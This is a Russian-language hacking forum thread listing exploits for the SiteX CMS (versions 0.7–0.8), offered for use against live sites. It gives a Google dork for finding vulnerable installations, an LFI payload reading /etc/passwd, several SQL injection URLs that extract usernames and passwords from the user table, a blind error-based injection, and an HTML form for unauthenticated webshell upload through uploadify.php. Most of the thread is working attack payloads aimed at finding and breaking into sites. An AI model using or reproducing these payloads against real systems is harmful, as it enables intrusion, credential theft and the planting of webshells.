![]() |
Обзор Уязвимостей SiteX
Уязвимости SiteX 0.7 Beta
download: http://jaist.dl.sourceforge.net/sourceforge/sitex/SiteX_074_build_418.zip dork: "Powered by SiteX 0.7 Beta" (выдачу гугла больше 10 линков не ставьте ;) ) 1) [LFI] (требования: magic_quotes=off, register_globals=on) /themes/Corporate/homepage.php уязвимый код: PHP код:
Код:
/themes/Corporate/homepage.php?THEME_FOLDER=../../../../../../../../etc/passwd%002) [SQL-injection] (требования: magic_quotes=off, register_globals=on) links.php уязвимый код: PHP код:
Код:
/links.php?category=-1'+union+select+1,concat_ws(0x3a,username,password),3+from+sitex_users--+P.S: шелл в админке аплоадится без проблем |
Цитата:
|
2 geezer.code
не на всех сайтах получается реализовать, поэтому как требование поставил =) |
Уязвимости SiteX 0.7 Beta
Product : SiteX 0.7.4 build 405 PHPinfo LFI SQL Injection SQL injection in Admin Panel |
5 копеек..)
------- 1) SQL injection(требования: mq=off, любой акк) file:/admin/profile_view.php PHP код:
Код:
/admin/profile_view.php?user=-123456'+union+select+1,User(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+--+2)blind SQL injection(требования: mq=off,желательно 5 ветка бд) file: /forums_topic.php PHP код:
Код:
/forums_topic.php?topicid=1'+and+(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)+--+ |
Внесу свой посильный вклад.
[Version 0.8.0 RC 3 build 524] Заливка шела. Не требуеться ни прав, ни авторизации, ни чего то еще. File: includes/uploadify/uploadify.php PHP код:
Exploit ^_^ Код:
<form enctype="multipart/form-data" action="http://targethost.com/includes/uploadify/uploadify.php" method="post" > |
| Время: 02:27 |